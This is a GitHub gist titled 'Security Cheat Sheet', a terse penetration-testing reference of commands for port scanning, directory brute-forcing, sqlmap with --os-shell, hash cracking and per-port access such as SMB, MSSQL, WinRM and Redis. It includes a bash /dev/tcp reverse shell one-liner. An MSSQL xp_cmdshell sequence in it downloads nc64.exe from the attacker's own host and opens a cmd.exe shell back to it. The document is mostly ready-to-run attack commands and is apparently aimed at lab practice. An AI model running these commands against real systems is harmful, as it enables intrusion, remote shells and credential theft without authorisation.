Skip to content

Instantly share code, notes, and snippets.

@asminog

asminog/README.md

Last active April 7, 2024 17:16
Show Gist options
  • Save asminog/b654e29fc82a169a71c0a5f907d4251b to your computer and use it in GitHub Desktop.
Save asminog/b654e29fc82a169a71c0a5f907d4251b to your computer and use it in GitHub Desktop.
Download ZIP
Security Cheat Sheet
Raw
README.md

TOOLS

nmap - ports scan

apt install nmap
nmap -p- --min-rate 1000 -sC -sV {$host}

gobuster - enumeration directory, files or subdomain

apt install gobuster
git clone https://github.com/danielmiessler/SecLists.git

gobuster dir -u http://{$host} -w ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir -u http://{$host} x php,html -w ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster vhost -u http://{$host} -w ./SecLists/Discovery/DNS/subdomains-top1million-5000.txt

sqlmap - sql injection

apt install sqlmap
sqlmap -u 'http://{$host}/dashboard.php?search=any+query' --cookie="PHPSESSID={$hash}" --os-shell

Responder

git clone https://github.com/lgandx/Responder
apt install python3-pip
pip install netifaces
sudo python3 Responder.py -I tun0

John The Ripper

apt install john
git clone https://github.com/danielmiessler/SecLists.git
tar -zvf ./SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Reverse shell

apt install ncat
# listen
nc -nvlp {$port}
# connect
bash -i >& /dev/tcp/{$ip}/{$port} 0>&1
# win
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
# bash on revency shell fix su: must be run from a terminal
/usr/bin/script -qc /bin/bash /dev/null

HTTP SERVER

python3 -m http.server {$port}

Impacket

apt install python3-pip
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py  install
# In case you are missing some modules:
pip3 install -r requirements.txt

winPEAS Windows Privilege Escalation

# https://github.com/peass-ng/PEASS-ng

PORTS

21/tcp ftp

apt install ftp
ftp anonymous@{$host}

22/tcp ssh

ssh root@{$host}

23/tcp TELNET

telnet {$host}

445/tcp smb

apt install smbclient
smbclient -L {$host}
smbclient \\\\{$host}\\SHARE

1433/tcp ms-sql

# use impacket tool
cd impacket/examples/
python3 mssqlclient.py DOMAIN/user@{$host} -windows-auth
# cheat sheet https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
#role check 
SELECT is_srvrolemember('sysadmin');
# execute command
EXEC xp_cmdshell 'net user'; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell
first as it’s disabled by default:
EXEC sp_configure 'show advanced options', 1; — priv
RECONFIGURE; — priv
EXEC sp_configure 'xp_cmdshell', 1; — priv
RECONFIGURE; — priv
xp_cmdshell "whoami"
# check current location
xp_cmdshell "powershell -c pwd"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{$your_ip}/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe {$your_ip} 443"

3306/tcp mysql

apt install default-mysql-client
mysql -h {$host} -u root
show databases;
use {$db_name};
show tables;
select * from {$table_name};

5985/tcp 5986/tcp NTLM PowerShell

apt install evil-winrm
evil-winrm -i {$host} -u administrator -p {$password}
# or 
cd impacket/example
python3 psexec.py administrator@{$host}

6379/tcp redis

apt install redis-tools
redis-cli -h {$host}
info
select {0-9}
keys *
get key

SERVICES

Amazon S3

apt install awscli
aws configure
# use temp for all
aws --endpoint=http://{$host} s3 ls
aws --endpoint=http://{$host} s3 ls s3://{$bucket_name}
#copy
aws --endpoint=http://{$host} s3 cp file s3://{$bucket_name}

LINKS

https://gtfobins.github.io/gtfobins/vi/#sudo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment